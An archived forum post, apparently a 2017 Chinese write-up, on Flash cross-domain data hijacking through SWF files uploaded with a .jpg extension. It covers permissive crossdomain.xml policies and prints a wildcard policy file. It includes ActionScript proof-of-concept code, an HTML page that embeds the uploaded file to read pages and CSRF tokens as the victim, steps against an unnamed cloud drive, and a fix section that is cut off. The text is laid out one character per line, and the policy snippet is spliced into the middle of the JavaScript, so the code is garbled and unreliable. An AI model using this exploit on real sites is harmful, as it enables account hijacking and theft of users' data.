论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[20917] 2017-10-04_Flash跨域数据劫持漏洞
文档创建者:
s7ckTeam
浏览次数:
14
最后更新:
2025-01-18
漏洞
14 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2017-10-04_Flash跨域数据劫持漏洞
F
l
a
s
h
跨
域
数
据
劫
持
漏
洞
L
e
m
o
n
S
e
c
2
0
1
7
-
1
0
-
0
4
f
l
a
s
h
跨
域
策
略
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
文
件
限
制
不
严
,
造
成
f
l
a
s
h
c
s
r
f
。
看
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
1
:
p
e
r
m
i
t
t
e
d
-
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
i
e
s
为
a
l
l
造
成
加
载
目
标
域
上
的
任
何
文
件
作
为
跨
域
策
略
文
件
,
甚
至
是
一
个
J
P
G
也
可
被
加
载
为
策
略
文
件
!
[
使
用
此
选
项
那
就
等
着
被
x
x
吧
!
]
2
:
a
l
l
o
w
-
a
c
c
e
s
s
-
f
r
o
m
设
为
“
*
”
任
何
的
域
,
有
权
限
通
过
f
l
a
s
h
读
取
本
域
中
的
内
容
。
3
:
a
l
l
o
w
-
h
t
t
p
-
r
e
q
u
e
s
t
-
h
e
a
d
e
r
s
-
f
r
o
m
h
e
a
d
e
r
设
个
“
*
”
允
许
发
送
任
何
消
息
头
。
0
×
0
1
,
背
景
很
多
上
传
文
件
的
后
端
逻
辑
在
实
现
时
,
仅
仅
验
证
了
文
件
后
缀
名
和
C
o
n
t
e
n
t
-
T
y
p
e
,
没
有
对
上
传
文
件
的
内
容
进
行
验
证
。
通
常
情
况
下
这
样
的
处
理
逻
辑
仅
仅
是
不
严
谨
,
不
会
造
成
太
大
的
安
全
隐
患
。
但
经
过
笔
者
测
试
,
发
现
o
b
j
e
c
t
标
签
在
包
含
f
l
a
s
h
文
件
时
没
有
对
嵌
入
的
文
件
后
缀
进
行
判
断
。
也
就
是
说
,
只
要
文
件
内
容
包
含
了
正
常
的
f
l
a
s
h
文
件
代
码
,
就
能
够
被
o
b
j
e
c
t
标
签
成
功
加
载
并
执
行
。
而
A
c
t
i
o
n
S
c
r
i
p
t
中
又
提
供
了
多
种
A
P
I
能
够
让
F
l
a
s
h
发
送
网
络
请
求
。
这
样
如
果
能
够
将
任
意
后
缀
的
F
l
a
s
h
文
件
上
传
到
目
标
域
中
,
就
能
够
在
攻
击
者
可
控
的
域
下
让
受
害
者
访
问
一
个
精
心
构
造
的
恶
意
页
面
,
来
对
目
标
域
进
行
跨
域
的
数
据
劫
持
,
获
取
受
害
者
当
前
S
e
s
s
i
o
n
下
的
C
S
R
F
T
o
k
e
n
,
以
受
害
者
的
身
份
打
开
目
标
域
的
任
何
特
权
页
面
,
进
行
特
权
操
作
。
0
×
0
2
,
利
用
条
件
目
标
网
站
的
文
件
上
传
逻
辑
没
有
验
证
文
件
内
容
;
上
传
的
文
件
没
有
做
域
隔
离
处
理
;
服
务
端
没
有
强
制
设
置
C
o
n
t
e
n
t
-
D
i
s
p
o
s
i
t
i
o
n
响
应
头
;
访
问
上
传
的
文
件
没
有
s
e
s
s
i
o
n
限
制
;
0
×
0
3
,
攻
击
场
景
构
造
:
首
先
需
要
构
造
一
个
p
o
c
s
w
f
文
件
能
够
对
外
发
送
h
t
t
p
请
求
,
这
里
只
做
演
示
用
,
因
此
只
实
现
了
发
送
简
单
的
G
E
T
请
求
,
代
码
如
下
:
1
.
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
L
o
a
d
e
r
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
R
e
q
u
e
s
t
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
L
o
a
d
e
r
D
a
t
a
F
o
r
m
a
t
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
V
a
r
i
a
b
l
e
s
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
e
v
e
n
t
s
.
E
v
e
n
t
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
e
v
e
n
t
s
.
H
T
T
P
S
t
a
t
u
s
E
v
e
n
t
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
e
v
e
n
t
s
.
I
O
E
r
r
o
r
E
v
e
n
t
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
e
v
e
n
t
s
.
P
r
o
g
r
e
s
s
E
v
e
n
t
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
e
v
e
n
t
s
.
S
e
c
u
r
i
t
y
E
r
r
o
r
E
v
e
n
t
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
d
i
s
p
l
a
y
.
L
o
a
d
e
r
I
n
f
o
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
m
p
o
r
t
f
l
a
s
h
.
s
y
s
t
e
m
.
S
e
c
u
r
i
t
y
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
S
e
c
u
r
i
t
y
.
a
l
l
o
w
D
o
m
a
i
n
(
"
*
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
u
r
l
O
b
j
:
O
b
j
e
c
t
=
L
o
a
d
e
r
I
n
f
o
(
t
h
i
s
.
r
o
o
t
.
l
o
a
d
e
r
I
n
f
o
)
.
p
a
r
a
m
e
t
e
r
s
.
u
r
l
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
r
e
q
u
e
s
t
:
U
R
L
R
e
q
u
e
s
t
=
n
e
w
U
R
L
R
e
q
u
e
s
t
(
u
r
l
O
b
j
.
t
o
S
t
r
i
n
g
(
)
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
r
e
q
u
e
s
t
.
m
e
t
h
o
d
=
U
R
L
R
e
q
u
e
s
t
M
e
t
h
o
d
.
G
E
T
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
l
o
a
d
e
r
:
U
R
L
L
o
a
d
e
r
=
n
e
w
U
R
L
L
o
a
d
e
r
(
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
t
e
m
S
c
r
o
l
l
.
x
=
r
e
s
p
o
n
s
e
.
x
+
r
e
s
p
o
n
s
e
.
w
i
d
t
h
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
t
e
m
S
c
r
o
l
l
.
y
=
r
e
s
p
o
n
s
e
.
y
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
t
e
m
S
c
r
o
l
l
.
h
e
i
g
h
t
=
r
e
s
p
o
n
s
e
.
h
e
i
g
h
t
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
l
o
a
d
e
r
.
d
a
t
a
F
o
r
m
a
t
=
U
R
L
L
o
a
d
e
r
D
a
t
a
F
o
r
m
a
t
.
T
E
X
T
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
l
o
a
d
e
r
.
a
d
d
E
v
e
n
t
L
i
s
t
e
n
e
r
(
E
v
e
n
t
.
C
O
M
P
L
E
T
E
,
l
o
a
d
e
r
_
c
o
m
p
l
e
t
e
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
l
o
a
d
e
r
.
l
o
a
d
(
r
e
q
u
e
s
t
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
f
u
n
c
t
i
o
n
l
o
a
d
e
r
_
c
o
m
p
l
e
t
e
(
e
:
E
v
e
n
t
)
:
v
o
i
d
{
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
t
r
a
c
e
(
"
E
v
e
n
t
.
C
O
M
P
L
E
T
E
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
t
r
a
c
e
(
"
R
e
s
p
D
a
t
a
:
n
"
+
l
o
a
d
e
r
.
d
a
t
a
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
r
e
s
p
o
n
s
e
.
t
e
x
t
=
l
o
a
d
e
r
.
d
a
t
a
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
t
e
m
S
c
r
o
l
l
.
s
c
r
o
l
l
T
a
r
g
e
t
=
r
e
s
p
o
n
s
e
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
}
<
/
p
>
首
先
使
用
了
L
o
a
d
e
r
I
n
f
o
(
t
h
i
s
.
r
o
o
t
.
l
o
a
d
e
r
I
n
f
o
)
从
o
b
j
e
c
t
标
签
的
f
l
a
s
h
V
a
r
s
参
数
中
提
取
出
要
访
问
的
U
R
L
,
再
使
用
U
R
L
L
o
a
d
e
r
对
该
U
R
L
发
送
G
E
T
请
求
,
响
应
结
果
回
显
到
一
个
T
e
x
t
控
件
中
,
用
作
验
证
。
接
下
来
构
造
一
个
页
面
用
于
包
含
s
w
f
文
件
,
代
码
如
下
:
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
h
t
m
l
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
h
e
a
d
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
t
i
t
l
e
>
F
l
a
s
h
C
S
R
F
P
O
C
b
y
p
n
i
g
0
s
@
F
r
e
e
B
u
f
<
/
t
i
t
l
e
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
/
h
e
a
d
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
b
o
d
y
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
h
2
>
F
l
a
s
h
C
S
R
F
P
O
C
b
y
p
n
i
g
0
s
@
F
r
e
e
B
u
f
<
/
h
2
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
d
i
v
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
u
r
l
:
<
i
n
p
u
t
t
y
p
e
=
"
t
e
x
t
"
i
d
=
"
s
w
f
u
r
l
"
s
t
y
l
e
=
"
w
i
d
t
h
:
5
0
0
"
>
<
/
b
r
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
h
i
j
a
c
k
u
r
l
:
<
i
n
p
u
t
t
y
p
e
=
"
t
e
x
t
"
i
d
=
"
c
s
r
f
u
r
l
"
s
t
y
l
e
=
"
w
i
d
t
h
:
5
0
0
"
>
<
/
b
r
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
i
n
p
u
t
t
y
p
e
=
"
b
u
t
t
o
n
"
v
a
l
u
e
=
"
s
u
b
m
i
t
"
i
d
=
"
s
u
b
m
i
t
"
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
/
d
i
v
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
i
f
r
a
m
e
n
a
m
e
=
"
s
w
f
"
s
t
y
l
e
=
"
w
i
d
t
h
:
1
0
0
0
;
h
e
i
g
h
t
:
1
0
0
0
"
>
<
/
i
f
r
a
m
e
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
s
c
r
i
p
t
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
f
u
n
c
t
i
o
n
w
r
i
t
e
f
l
a
s
h
o
b
j
e
c
t
(
u
r
l
,
p
a
r
a
s
t
r
)
{
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
=
w
i
n
d
o
w
.
f
r
a
m
e
s
[
"
s
w
f
"
]
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
.
d
o
c
u
m
e
n
t
.
w
r
i
t
e
(
"
<
o
b
j
e
c
t
c
l
a
s
s
i
d
=
"
c
l
s
i
d
:
d
2
7
c
d
b
6
e
-
a
e
6
d
-
1
1
c
f
-
9
6
b
8
-
4
4
4
5
5
3
5
4
0
0
0
0
"
c
o
d
e
b
a
s
e
=
"
h
t
t
p
:
/
/
f
p
d
o
w
n
l
o
a
d
.
m
a
c
r
o
m
e
d
i
a
.
c
o
m
/
p
u
b
/
s
h
o
c
k
w
a
v
e
/
c
a
b
s
/
f
l
a
s
h
/
s
w
f
l
a
s
h
.
c
a
b
#
v
e
r
s
i
o
n
=
7
,
0
,
0
,
0
"
w
i
d
t
h
=
"
1
0
0
0
"
h
e
i
g
h
t
=
"
1
0
0
0
"
i
d
=
"
F
l
a
s
h
V
a
r
s
"
a
l
i
g
n
=
"
m
i
d
d
l
e
"
>
n
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
.
d
o
c
u
m
e
n
t
.
w
r
i
t
e
(
"
<
p
a
r
a
m
n
a
m
e
=
"
a
l
l
o
w
S
c
r
i
p
t
A
c
c
e
s
s
"
v
a
l
u
e
=
"
a
l
w
a
y
s
"
/
>
n
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
.
d
o
c
u
m
e
n
t
.
w
r
i
t
e
(
"
<
p
a
r
a
m
n
a
m
e
=
"
m
o
v
i
e
"
v
a
l
u
e
=
"
F
l
a
s
h
V
a
r
s
.
s
w
f
"
/
>
n
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
.
d
o
c
u
m
e
n
t
.
w
r
i
t
e
(
"
<
p
a
r
a
m
n
a
m
e
=
"
F
l
a
s
h
V
a
r
s
"
v
a
l
u
e
=
"
"
+
p
a
r
a
s
t
r
+
"
"
/
>
n
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
.
d
o
c
u
m
e
n
t
.
w
r
i
t
e
(
"
<
p
a
r
a
m
n
a
m
e
=
"
q
u
a
l
i
t
y
"
v
a
l
u
e
=
"
h
i
g
h
"
/
>
n
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
.
d
o
c
u
m
e
n
t
.
w
r
i
t
e
(
"
<
p
a
r
a
m
n
a
m
e
=
"
b
g
c
o
l
o
r
"
v
a
l
u
e
=
"
#
f
f
f
f
f
f
"
/
>
n
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
.
d
o
c
u
m
e
n
t
.
w
r
i
t
e
(
"
<
e
m
b
e
d
s
r
c
=
"
"
+
u
r
l
+
"
"
q
u
a
l
i
t
y
=
"
h
i
g
h
"
b
g
c
o
l
o
r
=
"
#
f
f
f
f
f
f
"
w
i
d
t
h
=
"
5
5
0
"
h
e
i
g
h
t
=
"
4
0
0
"
n
a
m
e
=
"
F
l
a
s
h
V
a
r
s
"
a
l
i
g
n
=
"
m
i
d
d
l
e
"
a
l
l
o
w
S
c
r
i
p
t
A
c
c
e
s
s
=
"
a
l
w
a
y
s
"
F
l
a
s
h
V
a
r
s
=
"
"
+
p
a
r
a
s
t
r
+
"
"
t
y
p
e
=
"
a
p
p
l
i
c
a
t
i
o
n
/
x
-
s
h
o
c
k
w
a
v
e
-
f
l
a
s
h
"
p
l
u
g
i
n
s
p
a
g
e
=
"
h
t
t
p
:
/
/
w
w
w
.
m
a
c
r
o
m
e
d
i
a
.
c
o
m
/
g
o
/
g
e
t
f
l
a
s
h
p
l
a
y
e
r
"
/
>
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
w
f
.
d
o
c
u
m
e
n
t
.
w
r
i
t
e
(
"
<
/
o
b
j
e
c
t
>
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
}
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
f
u
n
c
t
i
o
n
g
e
t
(
n
a
m
e
)
{
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
q
u
e
r
y
=
w
i
n
d
o
w
.
l
o
c
a
t
i
o
n
.
s
e
a
r
c
h
.
s
u
b
s
t
r
i
n
g
(
1
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
p
a
i
r
s
=
q
u
e
r
y
.
s
p
l
i
t
(
"
&
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
<
?
x
m
l
v
e
r
s
i
o
n
=
"
1
.
0
"
?
>
<
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
y
>
<
s
i
t
e
-
c
o
n
t
r
o
l
p
e
r
m
i
t
t
e
d
-
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
i
e
s
=
"
a
l
l
"
/
>
<
a
l
l
o
w
-
a
c
c
e
s
s
-
f
r
o
m
d
o
m
a
i
n
=
"
*
"
/
>
<
a
l
l
o
w
-
h
t
t
p
-
r
e
q
u
e
s
t
-
h
e
a
d
e
r
s
-
f
r
o
m
d
o
m
a
i
n
=
"
*
"
h
e
a
d
e
r
s
=
"
*
"
/
>
<
/
c
r
o
s
s
-
d
o
m
a
i
n
-
p
o
l
i
c
y
>
b
o
t
t
o
m
:
1
0
p
x
;
"
>
f
o
r
(
v
a
r
i
=
0
;
i
<
p
a
i
r
s
.
l
e
n
g
t
h
;
i
+
+
)
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
{
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
p
o
s
=
p
a
i
r
s
[
i
]
.
i
n
d
e
x
O
f
(
'
=
'
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
f
(
p
o
s
=
=
-
1
)
c
o
n
t
i
n
u
e
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
a
r
g
n
a
m
e
=
p
a
i
r
s
[
i
]
.
s
u
b
s
t
r
i
n
g
(
0
,
p
o
s
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
v
a
l
u
e
=
p
a
i
r
s
[
i
]
.
s
u
b
s
t
r
i
n
g
(
p
o
s
+
1
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
i
f
(
a
r
g
n
a
m
e
=
=
n
a
m
e
)
{
r
e
t
u
r
n
v
a
l
u
e
;
}
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
}
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
}
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
s
u
b
m
i
t
=
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
"
s
u
b
m
i
t
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
s
u
b
m
i
t
.
a
d
d
E
v
e
n
t
L
i
s
t
e
n
e
r
(
"
c
l
i
c
k
"
,
f
u
n
c
t
i
o
n
(
)
{
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
s
w
f
u
r
l
=
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
"
s
w
f
u
r
l
"
)
.
v
a
l
u
e
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
v
a
r
p
a
r
a
m
=
"
u
r
l
=
"
+
d
o
c
u
m
e
n
t
.
g
e
t
E
l
e
m
e
n
t
B
y
I
d
(
"
c
s
r
f
u
r
l
"
)
.
v
a
l
u
e
;
/
/
"
u
r
l
=
"
+
g
e
t
(
"
c
s
r
f
u
r
l
"
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
w
r
i
t
e
f
l
a
s
h
o
b
j
e
c
t
(
s
w
f
u
r
l
,
p
a
r
a
m
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
r
e
t
u
r
n
f
a
l
s
e
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
}
)
;
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
/
s
c
r
i
p
t
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
/
b
o
d
y
>
<
/
p
>
<
p
s
t
y
l
e
=
"
m
a
r
g
i
n
-
b
o
t
t
o
m
:
1
0
p
x
;
"
>
<
/
h
t
m
l
>
<
/
p
>
最
终
的
效
果
如
图
:
0
×
0
3
,
漏
洞
利
用
这
里
以
某
知
名
厂
商
提
供
的
云
盘
服
务
进
行
测
试
,
演
示
该
漏
洞
的
利
用
过
程
。
访
问
该
云
盘
服
务
的
文
件
上
传
页
面
。
将
之
前
写
好
的
s
w
f
文
件
后
缀
修
改
为
j
p
g
并
上
传
,
服
务
端
没
有
检
查
文
件
内
容
,
文
件
上
传
成
功
。
将
该
文
件
设
置
成
共
享
状
态
,
这
一
步
是
为
了
让
最
终
的
文
件
访
问
链
接
摆
脱
s
e
s
s
i
o
n
状
态
的
限
制
,
能
够
被
其
他
任
何
用
户
访
问
到
。
最
终
在
图
片
预
览
状
态
通
过
C
h
r
o
m
e
的
D
e
v
e
l
o
p
e
r
T
o
o
l
找
到
图
片
的
直
接
访
问
链
接
。
形
如
:
1
.
h
t
t
p
:
/
/
x
x
x
.
c
o
m
/
i
n
t
f
.
p
h
p
?
m
e
t
h
o
d
=
P
r
e
v
i
e
w
.
o
u
t
p
u
t
P
i
c
&
x
i
d
=
1
7
8
x
x
x
5
3
5
&
f
n
a
m
e
=
%
2
F
r
e
q
.
j
p
g
&
f
h
a
s
h
=
f
9
c
e
f
d
7
e
9
0
0
x
x
x
x
x
x
6
d
4
7
c
d
5
9
0
9
7
9
6
e
1
b
9
&
d
t
=
2
4
.
0
1
x
x
x
x
x
x
d
8
c
9
1
c
6
f
e
f
a
d
8
4
8
&
v
=
1
.
0
.
1
&
r
t
i
c
k
=
1
4
0
0
8
1
7
2
5
4
4
5
8
3
&
o
p
e
n
_
a
p
p
_
i
d
=
0
&
d
e
v
t
y
p
e
=
w
e
b
&
s
i
g
n
=
8
8
9
5
b
d
6
8
4
4
b
x
x
x
x
x
x
1
5
e
4
2
a
8
b
&
通
过
之
前
构
造
的
h
t
m
l
页
面
,
使
用
o
b
j
e
c
t
包
含
上
面
的
链
接
,
s
w
f
文
件
能
够
被
正
常
的
执
行
,
当
其
他
用
户
访
问
该
页
面
,
会
以
该
用
户
的
身
份
打
开
指
定
的
页
面
,
造
成
跨
域
数
据
劫
持
,
此
时
A
n
t
i
-
C
S
R
F
已
经
形
同
虚
设
,
可
以
获
取
C
S
R
F
T
o
k
e
n
,
访
问
特
权
页
面
,
进
行
特
权
操
作
。
0
×
0
4
,
影
响
范
围
经
过
笔
者
测
试
,
国
内
各
知
名
互
联
网
厂
商
,
各
云
存
储
提
供
商
均
受
到
该
问
题
的
影
响
。
除
此
之
外
,
经
过
测
试
,
一
些
知
名
的
开
源
上
传
组
件
如
U
E
d
i
t
o
r
,
C
K
E
d
i
t
o
r
,
K
i
n
d
E
d
i
t
o
r
,
X
h
E
d
i
t
o
r
,
E
w
e
b
e
d
i
t
o
r
等
也
均
受
到
该
问
题
的
影
响
。
更
多
其
他
厂
商
及
W
e
b
应
用
暂
未
做
更
多
测
试
,
不
过
可
以
预
见
受
该
问
题
影
响
的
站
点
数
量
较
多
。
0
×
0
5
,
修
复
建
议
根
据
之
前
提
到
过
的
利
用
条
件
,
修
复
的
方
法
也
就
显
而
易
见
了
。
对
上
传
文
件
内
容
进
行
检
查
:
当
然
这
并
不
容
易
,
除
了
j
p
g
类
型
,
能
够
直
接
在
线
访
问
的
文
件
类
型
很
多
,
尤
其
对
于
云
存
储
服
务
,
以
及
有
些
服
务
功
能
性
上
